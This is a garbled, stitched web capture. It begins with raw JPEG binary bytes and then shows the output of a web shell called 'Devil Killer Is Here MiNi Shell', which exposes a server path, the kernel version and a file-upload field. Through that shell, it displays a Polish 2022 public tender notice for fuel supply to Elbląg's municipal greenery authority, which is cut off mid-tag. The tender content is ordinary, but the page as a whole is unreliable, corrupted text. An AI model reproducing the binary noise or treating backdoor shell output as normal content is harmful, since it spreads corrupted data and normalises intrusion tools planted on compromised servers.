JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220105/0000694801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Sukcesywna bezgotówkowa sprzedaż benzyny bezołowiowej i oleju napędowego do pojazdów silnikowych i sprzętów Zarządu Zieleni Miejskiej w Elblągu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Zieleni Miejskiej w Elblągu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 280562301</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krakusa 13-16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zzm.elblag.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zzm.elblag.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarząd Zieleni Miejskiej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Sukcesywna bezgotówkowa sprzedaż benzyny bezołowiowej i oleju napędowego do pojazdów silnikowych i sprzętów Zarządu Zieleni Miejskiej w Elblągu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dbe30c92-6e28-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00006948</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002404/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna bezgotówkowa sprzedaż benzyny bezołowiowej i oleju napędowego do pojazdów silnikowych i sprzętów Zarządu Zieleni Miejskiej w Elblągu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zzm-elblag.bip.gov.pl/search/publiccontracts/, https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej przetargi@zzm.elblag.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej przetargi@zzm.elblag.pl.<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7.	Link do postępowania oraz ID postępowania zamieszczone są na stronie internetowej prowadzonego postępowania. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8.	Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, pełnomocnictwo, dokumenty, o których mowa w art. 94 ust. 2 ustawy, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>9.	Informacje, oświadczenia lub dokumenty, inne niż określone w ppkt 8, przekazywane <br/>w postępowaniu, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w ppkt 2.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NK.2501.1.1.2022.EK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem umowy jest bezgotówkowa (bez stosowania zabezpieczeń finansowych <br/>w postaci np. gwarancji bankowych, weksli, kredytu itp.) sprzedaż paliw ciekłych tj. benzyny bezołowiowej i oleju napędowego zwanych dalej „paliwami” do pojazdów silnikowych i sprzętu oraz kanistrów Zamawiającego na stacji paliw Wykonawcy, na zasadzie doraźnych tankowań, w ilościach gwarantowanych (zakres podstawowy):<br/>1) oleju napędowego – 31700 litrów; <br/>2) benzyny bezołowiowej PB-95- 14000 litrów.<br/>2.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji, tj. zakupu większych ilości paliw w zależności od zapotrzebowania Zamawiającego i posiadanych przez niego środków finansowych. Maksymalne ilości paliw w zakresie prawa opcji określone zostają na:<br/>1) olej napędowy – 10 584 litrów;<br/>2) benzyna bezołowiowa PB-95– 4 073 litrów.<br/>3.	Niewykonanie przez Zamawiającego umowy w zakresie prawa opcji, nie wymaga podania przyczyn i nie stanowi podstawy jego odpowiedzialności z tytułu niewykonania <br/>lub nienależytego wykonania umowy.<br/>4.	Wykonawca oświadcza, że nie będzie względem Zamawiającego wnosił roszeń z tytułu zmian w ilościach paliwa, które są ujęte w ust. 1 pomiędzy benzyną, a olejem napędowym.<br/>5.	Oferowane paliwa muszą odpowiadać wymogom jakościowym określonym w odpowiednich normach i przepisach prawa, a w szczególności:<br/>1)	ustawie z dnia 25 sierpnia 2006 r. o systemie monitorowania i kontrolowania jakości paliw (t.j. Dz. U. z 2021 r. poz. 133 ze zm.);<br/>2)	rozporządzeniu Ministra Gospodarki z dnia 9 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U.2015, poz.1680).<br/>6.	Dostawy oleju napędowego, o którym mowa w ust. 1 pkt 1 oraz ust. 2 pkt 1 dotyczą gatunku odpowiedniego dla okresu letniego, przejściowego i zimowego. W przypadku spadków temperatury otoczenia poniżej minus 10°C dostarczany olej napędowy powinien odpowiadać paliwu zimowemu. Wykonawca umowy zapewni Zamawiającemu dostawę danego gatunku oleju napędowego w zależności od aktualnej temperatury otoczenia.<br/>7.	Parametry techniczne i chemiczne dostarczanych paliw nie mogą być gorsze niż określone <br/>w załącznikach do rozporządzenia Ministra Gospodarki z dnia 9 października 2015 r. <br/>w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. 2015 poz.1680). przy czym dostarczone paliwo musi być zgodne w dniu dostawy z aktualnie obowiązującymi przepisami <br/>w tym zakresie.<br/>8.	Zakup paliw dokonywany będzie sukcesywnie na stacji paliw zlokalizowanej w promieniu 6 km od siedziby Zamawiającego. <br/>9.	Paliwo tankowane będzie sukcesywnie na stacji paliw Wykonawcy do pojazdów silnikowych <br/>i sprzętu Zamawiającego oraz do kanistrów na potrzeby pojazdów silnikowych i sprzętu Zamawiającego. Zakup paliwa dokonywany będzie w sposób bezgotówkowy.<br/>10.	Faktury za pobrane paliwo będą wystawiane przez Wykonawcę w uzgodnionych okresach rozliczeniowych, tj.: raz w miesiącu, ostatniego dnia miesiąca). Termin płatności za fakturę nie będzie krótszy niż 30 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionej faktury po okresie rozliczeniowym.<br/>11.	Faktury VAT wystawiane będą za faktycznie pobrane paliwa i dołączone do nich będą wykazy tankowań. Szczegółowe warunki realizacji zamówienia w zakresie zakupu i rozliczeń zakupionego przez Zamawiającego paliwa określono we wzorze umowy stanowiącym załącznik nr 3 do SWZ. Paliwo tankowane będzie sukcesywnie do pojazdów silnikowych i sprzętów Zamawiającego oraz do kanistrów na potrzeby pojazdów silnikowych i sprzętów Zamawiającego po okazaniu Wykonawcy karty drogowej lub dziennego raportu pracy sprzętu wystawionego przez Zamawiającego poprzez legalizowane przepływomierze. Wykaz osób upoważnionych przez Zamawiającego do tankowania paliwa zostanie przekazany Wykonawcy w dniu podpisania umowy i będzie stanowił jej integralną część. Wykaz będzie przez Zamawiającego aktualizowany. Aktualizacja wykazu nie wymaga aneksu do umowy. Skutki braku aktualizacji obciążają Zamawiającego.<br/>12.	Wykonawca zobowiązany jest potwierdzić ilość zatankowanego paliwa na karcie drogowej lub dziennym raporcie pracy sprzętu wystawionym przez Zamawiającego oraz dokonać wpisu <br/>w zbiorczym zestawieniu wydanego paliwa, stanowiącym załącznik nr 1 i załącznik nr 2 <br/>do umowy, z uwzględnieniem:<br/>1)	daty pobrania paliwa;<br/>2)	nr karty drogowej lub dziennego raportu pracy sprzętu;<br/>3)	nr rejestracyjnego pojazdu lub nazwy sprzętu;<br/>4)	ilości zatankowanego paliwa;<br/>5)	zależnie od metody rozliczeń wskazanych w § 7 ust. 1 dla „sposobu I” podaje cenę 1 litra paliwa obowiązującą w momencie tankowania, a dla „sposobu II” podaje cenę 1 litra paliwa określoną przez producenta, która obowiązuje w okresie rozliczeniowym. <br/>6)	imię i nazwisko osoby pobierającej paliwo.<br/>13.	Kierowca lub inny pracownik Zamawiającego uprawniony do tankowania paliwa zobowiązany jest potwierdzić ilość zatankowanego przez siebie paliwa na zbiorczym zestawieniu wydania paliwa.<br/>14.	Wykonawca prowadzi zbiorcze zestawienia wydania paliwa oddzielnie dla oleju napędowego<br/>i benzyny bezołowiowej.<br/>15.	Na podstawie prawidłowo wypełnionych zbiorczych zestawień wydania paliwa Wykonawca wystawi faktury VAT. Kserokopie zbiorczych zestawień wydania paliwa Wykonawca dołącza do faktury.<br/>16.	Faktury VAT za pobrane paliwo będą wystawiane przez Wykonawcę oddzielnie na olej napędowy i benzynę bezołowiową dwa razy w miesiącu. Strony ustalają w każdym miesiącu 2 okresy rozliczeniowe tj. pierwszy okres rozliczeniowy obowiązujący od 1-go do 15-go dnia danego miesiąca kalendarzowego oraz drugi okres rozliczeniowy obowiązujący od 16-go do ostatniego dnia danego miesiąca kalendarzowego. <br/>17.	Za datę sprzedaży uznaje się ostatni dzień danego okresu rozliczeniowego.<br/>18.	Zamawiający dopuszcza możliwość tankowania paliwa do pojazdów silnikowych i sprzętów Zamawiającego oraz do kanistrów na potrzeby pojazdów silnikowych i sprzętów Zamawiającego przy wykorzystaniu kart elektronicznych – paliwowych kart identyfikacyjnych zwanych dalej „kartami paliwowymi” zabezpieczonych numerem PIN i wystawionych na <br/>nr rejestracyjny pojazdu, nr ewidencyjny (inwentarzowy) sprzętu, kanister lub na okaziciela (imię i nazwisko pracownika Zamawiającego).<br/>19.	Zamawiający określa łączną ilość kart paliwowych na 53 szt., w tym karty paliwowe wystawione na:<br/>1)	nr rejestracyjny pojazdu – 19 szt.;<br/>2)	nr ewidencyjny (inwentarzowy) sprzętu - 14 szt.; <br/>3)	kanister – 13 szt.;<br/>4)	okaziciela (imię i nazwisko pracownika Zamawiającego) - 7 szt.<br/>wykaz pojazdów, oraz sprzętu zostanie przekazany w dniu podpisania umowy.<br/>20.	Karty paliwowe mogą zostać wydane przez Wykonawcę na wniosek lub zamówienia złożone przez Zamawiającego na dedykowanym portalu internetowym Wykonawcy, do którego dostęp otrzyma Zamawiający w terminie 3 dni od dnia podpisania umowy. Wykonawca zobowiązany jest dostarczyć Zamawiającemu wymaganą ilość kart paliwowych wraz z nr PIN najpóźniej <br/>w ciągu 14 dni od dnia podpisania umowy. <br/>21.	W przypadku zwiększenia ilości pojazdów silnikowych lub sprzętów, zmiany nr rejestracyjnych pojazdów będących w użytkowaniu Zamawiającego, Wykonawca wyda nieodpłatnie nowe karty paliwowe w terminie 5 dni roboczych od dnia zgłoszenia zaistniałej sytuacji. Za dni robocze strony uznają dni od poniedziałku do piątku.<br/>22.	W przypadku zgłoszenia przez Zamawiającego utraty karty paliwowej, Wykonawca zapewni jej natychmiastową blokadę w całej sieci stacji paliw Wykonawcy.<br/>23.	Wydawanie zakupionych paliw odbywać się będzie za pomocą kart paliwowych, na podstawie przedstawionej przez tankującego karty paliwowej do zbiorników paliwowych pojazdów <br/>i sprzętów oraz do kanistrów na potrzeby pojazdów i sprzętów należących do Zamawiającego - poprzez legalizowane przepływomierze. <br/>24.	Pracownik Zamawiającego tankujący paliwo zgodnie z ust. 9 zobowiązany jest <br/>do wprowadzenia właściwego kodu PIN przypisanego indywidualnie do karty paliwowej i jako potwierdzenie transakcji otrzyma dowód wydania (wydruk z terminala), gdzie jeden egzemplarz dowodu wydania otrzymuje pracownik Zamawiającego, natomiast drugi egzemplarz dowodu wydania zostaje na stacji paliw Wykonawcy. Dowód wydania będzie zawierał co najmniej następujące dane:<br/>1)	dane identyfikujące stację paliw;<br/>2)	datę transakcji/tankowania;<br/>3)	dane umieszczone na karcie paliwowej tj. nr rejestracyjny tankowanego pojazdu lub <br/>nr ewidencyjny (inwentarzowy) sprzętu lub kanister lub imię i nazwisko pracownika Zamawiającego;<br/>4)	nr karty paliwowej; <br/>5)	rodzaj paliwa;<br/>6)	ilość tankowanego paliwa;<br/>7)	cenę jednostkową zakupionego paliwa w dniu tankowania.<br/>25.	Wykonawca do każdej faktury VAT wystawionej do zatankowanego paliwa przy użyciu kart paliwowych zobowiązany jest dołączyć zbiorcze zestawienie dokonanych transakcji przez Zamawiającego w danym okresie rozliczeniowym zawierające co najmniej:<br/>1)	datę transakcji/tankowania;<br/>2)	dane umieszczone na karcie paliwowej tj. nr rejestracyjny tankowanego pojazdu lub <br/>nr ewidencyjny (inwentarzowy) sprzętu lub kanister lub imię i nazwisko pracownika Zamawiającego;<br/>3)	nr karty paliwowej; <br/>4)	ilość tankowanego paliwa;<br/>5)	zależnie od metody rozliczeń wskazanych w § 7 ust. 1 dla „sposobu I” cenę 1 litra paliwa obowiązującą w momencie tankowania, a dla „sposobu II” cenę 1 litra paliwa określoną przez producenta, która obowiązuje w okresie rozliczeniowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 2.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji, tj. zakupu większych ilości paliw w zależności od zapotrzebowania Zamawiającego i posiadanych przez niego środków finansowych. Maksymalne ilości paliw w zakresie prawa opcji określone zostają na:<br/>1) olej napędowy – 10 584 litrów;<br/>2) benzyna bezołowiowa PB-95– 4 073 litrów. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-24 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Sposób oceny ofert:<br/>Liczba punktów przyznawana dla oferty, w przyjętym kryterium oceny ofert: <br/>1) Sposób obliczenia XC:<br/><br/>XC =	cena (brutto) najniższa x 100 pkt<br/><br/> cena (brutto) badanej oferty<br/><br/>gdzie: <br/>Xc- liczba punktów przyznawana dla oferty w przyjętym kryterium: cena brutto oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt XV. i XVI. SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa przedmiotowego warunku.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Warunkiem udziału w postępowaniu jest posiadanie uprawnień do prowadzenia działalności gospodarczej, o której mowa w art. 32 ust 1 pkt 4 ustawy Prawo energetyczne z dnia z 10 kwietnia 1997 (tj. Dz. U. z 2021 r., poz. 716) tj. <br/>Posiadanie aktualnej koncesji na prowadzenie działalności gospodarczej <br/>w zakresie obrotu paliwami.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przedmiotowy warunek jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia działalności gospodarczej o której mowa w art. 32 ust 1 pkt 4 ustawy Prawo energetyczne z dnia z 10 kwietnia 1997, i zrealizuje dostawy do których realizacji te uprawnienia są wymagane.<br/><br/><br/><br/>3) sytuacji ekonomicznej lub finansowej:<br/>Warunkiem udziału w postępowaniu jest posiadanie ubezpieczenia <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na sumę gwarancyjną 200 000,00 zł.<br/><br/>4) zdolności technicznej lub zawodowej:<br/>Warunkiem udziału w postępowaniu jest dysponowanie minimum jedną stacją paliw w promieniu nie większym niż 6 km od siedziby Zamawiającego <br/>(tj. ul. Krakusa 13-16, 82-300 Elbląg), czynną codziennie co najmniej w godzinach: 6:00-18:00. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span 